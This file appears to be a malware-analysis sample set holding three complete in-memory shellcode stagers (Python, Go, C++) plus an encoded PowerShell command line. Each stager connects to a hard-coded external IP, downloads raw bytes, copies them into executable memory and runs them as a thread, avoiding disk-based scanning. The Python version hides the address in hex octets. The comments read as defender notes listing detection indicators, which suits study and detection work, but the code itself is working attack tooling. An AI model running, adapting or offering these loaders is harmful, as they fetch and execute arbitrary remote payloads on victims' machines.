
import ctypes,socket
# Analyst summary: in-memory stager. It pulls raw bytes from a hard-coded TCP endpoint,
# copies them into executable memory in this process, and starts a thread on them.
# Nothing is written to disk, so file-based scanning of the host will not see the payload.
#
# The destination is assembled from hex octets (0x5B,0x67,0x8C,0xE4 -> 91.103.140.228), so the
# dotted-quad never appears as a string literal; port is 58392. Hunt on the network connection
# (interpreter process -> raw IP, high port), not on a text match for the address.
p=b"";s=socket.create_connection((".".join(map(str,[0x5B,0x67,0x8C,0xE4])),58392))
# Accumulate until the peer closes the socket (recv returns b""). No length, integrity or
# authenticity check is applied to what arrives.
while d:=s.recv(4096):p+=d
s.close()
# Declare the return type as a pointer; ctypes otherwise treats the result as a C int.
ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_void_p
# 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE. A private RWX region
# allocated by a script interpreter is a strong behavioural indicator for EDR/memory scanners.
m=ctypes.windll.kernel32.VirtualAlloc(0,len(p),0x3000,0x40);assert m
# Copy the received bytes, unmodified, into the RWX region.
ctypes.memmove(m,(ctypes.c_char*len(p)).from_buffer_copy(p),len(p))
# Thread start address is the RWX region itself, i.e. memory not backed by any image on disk;
# thread-creation telemetry with an unbacked start address is the second indicator to alert on.
h=ctypes.windll.kernel32.CreateThread(None,0,ctypes.c_void_p(m),None,0,None)
# -1 is an infinite timeout: the interpreter process stays alive for as long as that thread runs.
ctypes.windll.kernel32.WaitForSingleObject(h,-1)
        
powershell.exe -EncodedCommand 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
        
package main

import (
    "net"
    "syscall"
    "unsafe"
)

// main is an in-memory stager: it reads raw bytes from a hard-coded TCP endpoint,
// copies them into a PAGE_EXECUTE_READWRITE region of its own process and starts
// a thread at that address. The payload never touches disk.
//
// Indicators for defenders, all visible below: outbound TCP to 91.103.140.228:58392,
// kernel32 procedures resolved by name at run time (VirtualAlloc, CreateThread,
// WaitForSingleObject), a private RWX allocation, and a thread whose start
// address lies in memory not backed by a file.
func main() {
    // The dial error is discarded; the address is a literal, so it is recoverable
    // from the binary's strings.
    c, _ := net.Dial("tcp", "91.103.140.228:58392")
    defer c.Close()
    b := make([]byte, 0)
    t := make([]byte, 4096)
    // Accumulate until a read returns zero bytes. The read error is discarded, so
    // EOF and failures both surface only as n == 0. Nothing validates the content.
    for {
        n, _ := c.Read(t)
        if n == 0 {
            break
        }
        b = append(b, t[:n]...)
    }
    // Lazy, by-name resolution of the kernel32 procedures used below.
    k := syscall.NewLazyDLL("kernel32.dll")
    // 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    v, _, _ := k.NewProc("VirtualAlloc").Call(0, uintptr(len(b)), 0x3000, 0x40)
    // The allocation is viewed as a 1 MiB byte array to copy into it; copy moves
    // min(1<<20, len(b)) bytes, so at most 1 MiB of the received data is placed.
    copy((*[1 << 20]byte)(unsafe.Pointer(v))[:], b)
    // Thread entry point is the RWX region that now holds the received bytes.
    h, _, _ := k.NewProc("CreateThread").Call(0, 0, v, 0, 0, 0)
    // 0xFFFFFFFF is INFINITE: the process stays resident while that thread runs.
    k.NewProc("WaitForSingleObject").Call(h, 0xFFFFFFFF)
}
        
#define _WINSOCK_DEPRECATED_NO_WARNINGS 
#include <winsock2.h>
#include <windows.h>
#include <string>
#pragma comment(lib,"ws2_32.lib")

// In-memory stager: receives raw bytes from a hard-coded TCP endpoint, copies them
// into a PAGE_EXECUTE_READWRITE region of this process and starts a thread there.
// The payload is never written to disk.
//
// Indicators for defenders, all visible below: outbound TCP to 91.103.140.228:58392,
// a private RWX allocation sized to the received data, and a thread whose start
// address lies in memory not backed by an image. No return value is checked.
int main() {
    WSADATA w; WSAStartup(MAKEWORD(2, 2), &w);
    SOCKET s = socket(AF_INET, SOCK_STREAM, 0);
    // Destination is a literal IPv4 address and port, recoverable from the binary.
    sockaddr_in a = { AF_INET,htons(58392) };
    a.sin_addr.s_addr = inet_addr("91.103.140.228");
    connect(s, (sockaddr*)&a, sizeof(a));
    char b[4096]; std::string p; int r;
    // Accumulate until recv returns 0 (peer closed) or an error; the content is
    // not length-checked, verified or authenticated.
    while ((r = recv(s, b, sizeof(b), 0)) > 0)p.append(b, r);
    WSACleanup();
    // 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
    void* m = VirtualAlloc(0, p.size(), 0x3000, 0x40);
    memcpy(m, p.data(), p.size());
    // Thread entry point is the RWX region holding the received bytes.
    HANDLE h = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)m, 0, 0, 0);
    // -1 converts to INFINITE: the process stays resident while that thread runs.
    WaitForSingleObject(h, -1);
}